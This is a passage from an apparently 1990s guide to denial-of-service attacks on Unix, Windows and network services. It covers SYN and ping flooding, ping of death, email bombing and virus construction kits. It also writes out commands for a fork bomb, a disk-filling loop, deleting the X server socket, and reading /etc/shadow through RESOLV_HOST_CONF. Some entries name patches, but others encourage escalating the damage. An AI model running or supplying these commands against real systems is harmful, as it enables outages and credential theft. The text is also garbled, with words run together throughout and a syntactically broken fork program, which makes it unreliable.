An attack using this script might eat some bandwidth, but it isnothing compared to the finger method or most other methods. Wellthe point is that some pretty common firewalls and httpd:s thinksthat the attack is a loop and turn them self down, until theadministrator sends kill -HUP. This is a simple high risk vulnerability that should be checkedand if present fixed..C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4-----------------------------------------------If the attacker makes a telnet connections to the Solaris 2.4 host andquits using:Ex:	Control-}	quitthen will inetd keep going "forever". Well a couple of hundred...The solution is to install the proper patch..C.8. HOW TO DISABLE ACCOUNTS-----------------------------Some systems disable an account after N number of bad logins, or waitsN seconds. You can use this feature to lock out specific users fromthe system..C.9. LINUX AND TCP TIME, DAYTIME----------------------------------Inetd under Linux is known to crash if to many SYN packets sends todaytime (port 13) and/or time (port 37).The solution is to install the proper patch..C.10. HOW TO DISABLE SERVICES------------------------------Most Unix systems disable a service after N sessions have beenopen in a given time. Well most systems have a reasonable default(lets say 800 - 1000), but not some SunOS systems that have thedefault set to 48...The solutions is to set the number to something reasonable..C.11. PARAGON OS BETA R1.4---------------------------If someone redirects an ICMP (Internet Control Message Protocol) packetto a paragon OS beta R1.4 will the machine freeze up and must berebooted. An ICMP redirect tells the system to override routingtables. Routers use this to tell the host that it is sendingto the wrong router. The solution is to install the proper patch..C.12. NOVELLS NETWARE FTP--------------------------Novells Netware FTP server is known to get short of memory if multipleftp sessions connects to it..C.13. ICMP REDIRECT ATTACKS----------------------------Gateways uses ICMP redirect to tell the system to override routingtables, that is telling the system to take a better way. To be ableto misuse ICMP redirection we must know an existing connection(well we could make one for ourself, but there is not much use for that). If we have found a connection we can send a route thatloses it connectivity or we could send false messages to the hostif the connection we have found don't use cryptation.  Ex: (false messages to send)	DESTINATION UNREACHABLE 	TIME TO LIVE EXCEEDED	PARAMETER PROBLEM	PACKET TOO BIGThe effect of such messages is a reset of the connection.The solution could be to turn ICMP redirects off, not much proper useof the service..C.14. BROADCAST STORMS-----------------------This is a very popular method in networks there all of the hosts areacting as gateways. There are many versions of the attack, but the basic method is to send a lot of packets to all hosts in the network with a destination that don't exist. Each host will try to forward each packet so the packets will bounce around for a long time. And if new packets keep coming the network will soon be in trouble.Services that can be misused as tools in this kind of attack is forexample ping, finger and sendmail. But most services can be misusedin some way or another..C.15. EMAIL BOMBING AND SPAMMING---------------------------------In a email bombing attack the attacker will repeatedly send identicalemail messages to an address. The effect on the target is high bandwidth,a hard disk with less space and so on... Email spamming is about sendingmail to all (or rather many) of the users of a system. The point ofusing spamming instead of bombing is that some users will try tosend a replay and if the address is false will the mail bounce back. Inthat cause have one mail transformed to three mails. The effect on thebandwidth is obvious.There is no way to prevent email bombing or spamming. However havea look at CERT:s paper "Email bombing and spamming"..C.16. TIME AND KERBEROS------------------------If not the the source and target machine is closely aligned will theticket be rejected, that means that if not the protocol that set the time is protected it will be possible to set a kerberos server offunction..C.17. THE DOT DOT BUG----------------------Windows NT file sharing system is vulnerable to the under Windows 95famous dot dot bug (dot dot like ..). Meaning that anyone can crashthe system. If someone sends a "DIR ..\" to the workstation will aSTOP messages appear on the screen on the Windows NT computer. Note thatit applies to version 3.50 and 3.51 for both workstation and serverversion.The solution is to install the proper patch..C.18. SUNOS KERNEL PANIC-------------------------Some SunOS systems (running TIS?) will get a kernel panic if agetsockopt() is done after that a connection has been reset.The solution could be to install Sun patch 100804..C.19. HOSTILE APPLETS----------------------A hostile applet is any applet that attempts to use your systemin an inappropriate manner. The problems in the java languagecould be sorted in two main groups:	1) Problems due to bugs.	2) Problems due to features in the language.In group one we have for example the java bytecode verifier bug, whichmakes is possible for an applet to execute any command that the usercan execute. Meaning that all the attack methods described in .D.X. could be executed through an applet. The java bytecode verifier bugwas discovered in late March 1996 and no patch have yet been available(correct me if I'am wrong!!!).Note that two other bugs could be found in group one, but theyare both fixed in Netscape 2.01 and JDK 1.0.1.Group two are more interesting and one large problem found is thefact that java can connect to the ports. Meaning that all the methodsdescribed in .C.X. can be performed by an applet. More informationand examples could be found at address:		http://www.math.gatech.edu/~mladue/HostileArticle.htmlIf you need a high level of security you should use some sort offirewall for protection against java. As a user you could havejava disable. .C.20. VIRUS------------Computer virus is written for the purpose of spreading anddestroying systems. Virus is still the most common and famousdenial of service attack method.It is a misunderstanding that virus writing is hard. If you knowassembly language and have source code for a couple of virus itis easy. Several automatic toolkits for virus construction couldalso be found, for example:		* Genvir.	* VCS (Virus Construction Set).	* VCL (Virus Construction Laboratory).	* PS-MPC (Phalcon/Skism - Mass Produced Code Generator).	* IVP (Instant Virus Production Kit).	* G2 (G Squared).PS-MPC and VCL is known to be the best and can help the novice programmerto learn how to write virus.An automatic tool called MtE could also be found. MtE will transformvirus to a polymorphic virus. The polymorphic engine of MtE is wellknown and should easily be catch by any scanner..C.21. ANONYMOUS FTP ABUSE--------------------------If an anonymous FTP archive have a writable area it could be misusedfor a denial of service attack similar with with .D.3. That is we canfill up the hard disk.Also can a host get temporarily unusable by massive numbers ofFTP requests.For more information on how to protect an anonymous FTP site couldCERT:s "Anonymous FTP Abuses" be a good start..C.22. SYN FLOODING-------------------Both 2600 and Phrack have posted information about the syn flooding attack.2600 have also posted exploit code for the attack. As we know the syn packet is used in the 3-way handshake. The syn floodingattack is based on an incomplete handshake. That is the attacker hostwill send a flood of syn packet but will not respond with an ACK packet.The TCP/IP stack will wait a certain amount of time before droppingthe connection, a syn flooding attack will therefore keep the syn_received connection queue of the target machine filled.The syn flooding attack is very hot and it is easy to find more informationabout it, for example:	[.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html	Article by Christopher Klaus, including a "solution". 		[.2.] http://jya.com/floodd.txt	2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane	[.3.] http://www.fc.net/phrack/files/p48/p48-14.html	IP-spoofing Demystified by daemon9 / route / infinity     	for Phrack Magazine.C.23. PING FLOODING--------------------I haven't tested how big the impact of a ping flooding attack is, butit might be quite big.Under Unix we could try something like: ping -s hostto send 64 bytes packets. If you have Windows 95, click the start button, select RUN, then typein: PING -T -L 256 xxx.xxx.xxx.xx. Start about 15 sessions..C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES----------------------------------------------------------If someone can ping your machine from a Windows 95 machine he or she mightreboot or freeze your machine. The attacker simply writes:ping -l 65510 address.to.the.machineAnd the machine will freeze or reboot.Works for kernel 2.0.7 up to version 2.0.20. and 2.1.1. for Linux (crash).AIX4, OSF, HPUX 10.1, DUnix 4.0 (crash).OSF/1, 3.2C, Solaris 2.4 x86 (reboot)..C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE--------------------------------------------------The subnet mask reply message is used under the reboot, but somehosts are known to accept the message any time without any check.If so all communication to or from the host us turned off, it's dead.The host should not accept the message any time but under the reboot..C.26. FLEXlm-------------Any host running FLEXlm can get the FLEXlm license manager daemonon any network to shutdown using the FLEXlm lmdown command.# lmdown -c /etc/licence.datlmdown - Copyright (C) 1989, 1991 Highland Software, Inc.Shutting down FLEXlm on nodes: xxxAre you sure? [y/n]: yShut down node xxx#.C.27. BOOTING WITH TRIVIAL FTP-------------------------------To boot diskless workstations one often use trivial ftp with rarp orbootp. If not protected an attacker can use tftp to boot the host..D. ATTACKING FROM THE INSIDE~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.D.1. KERNEL PANIC UNDER SOLARIS 2.3------------------------------------Solaris 2.3 will get a kernel panic if thisis executed:EX:		$ndd /dev/udp udp_statusThe solution is to install the proper patch..D.2. CRASHING THE X-SERVER---------------------------If stickybit is not set in /tmp then can the file /tmp/.x11-unix/x0be removed and the x-server will crash.Ex:	$ rm /tmp/.x11-unix/x0.D.3. FILLING UP THE HARD DISK-----------------------------If your hard disk space is not limited by a quota or if you can use/tmp then it`s possible for you to fill up the file system.Ex:	while : ;	mkdir .xxx	cd .xxx	done.D.4. MALICIOUS USE OF eval---------------------------Some older systems will crash if eval '\!\!' is executed in theC-shell.Ex: 	% eval '\!\!'	.D.5. MALICIOUS USE OF fork() -----------------------------If someone executes this C++ program the result will result in a crashon most systems.Ex:		#include <sys/types.h>	#include <unistd.h>	#include <iostream.h>		main()	{		int x;		while(x=0;x<1000000;x++)			{				system("uptime");				fork();			}	}You can use any command you want, but uptime is nicebecause it shows the workload.To get a bigger and very ugly attack you should however replace uptime(or fork them both) with sync. This is very bad.If you are real mean you could also fork a child process forevery child process and we will get an exponential increase ofworkload. There is no good way to stop this attack andsimilar attacks. A solution could be to place a limiton time of execution and size of processes..D.6. CREATING FILES THAT IS HARD TO REMOVE-------------------------------------------Well all files can be removed, but here is some ideas:Ex.I.	$ cat > -xxx	^C	$ ls	-xxx	$ rm -xxx	rm: illegal option -- x	rm: illegal option -- x	rm: illegal option -- x	usage: rm [-fiRr] file ...	$Ex.II.	$ touch xxx!	$ rm xxx!	rm: remove xxx! (yes/no)? y	$ touch xxxxxxxxx!	$ rm xxxxxxxxx!	bash: !": event not found	$	(You see the size do count!)Other well know methods is files with odd characters or spacesin the name. These methods could be used in combination with ".D.3 FILLING UP THEHARDDISK". If you do want to remove these files you must use some sortof script or a graphical interface like OpenWindow:s FileManager. You can also try to use: rm ./<filename>. It should work forthe first example if you have a shell..D.7. DIRECTORY NAME LOOKUPCACHE--------------------------------Directory name lookupcache (DNLC) is used whenever a file is opened.DNLC associates the name of the file to a vnode. But DNLC can onlyoperate on files with names that has less than N characters (for SunOS 4.xup to 14 character, for Solaris 2.x up 30 characters). This meansthat it's dead easy to launch a pretty discreet denial of service attack.Create lets say 20 directories (for a start) and put 10 empty files inevery directory. Let every name have over 30 characters and execute ascript that makes a lot of ls -al on the directories.If the impact is not big enough you should create more files or launchmore processes. .D.8. CSH ATTACK----------------Just start this under /bin/csh (after proper modification) and the load level will get very high (that is 100% of the cpu time) in a very short time. Ex:	|I /bin/csh	nodename : **************b.D.9. CREATING FILES IN /tmp----------------------------Many programs creates files in /tmp, but are unable to deal with the problemif the file already exist. In some cases this could be used for adenial of service attack..D.10. USING RESOLV_HOST_CONF-----------------------------Some systems have a little security hole in the way they use theRESOLV_HOST_CONF variable. That is we can put things in it andthrough ping access confidential data like /etc/shadow orcrash the system. Most systems will crash if /proc/kcore is read in the variable and access through ping.Ex:		$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf.D.11. SUN 4.X AND BACKGROUND JOBS	----------------------------------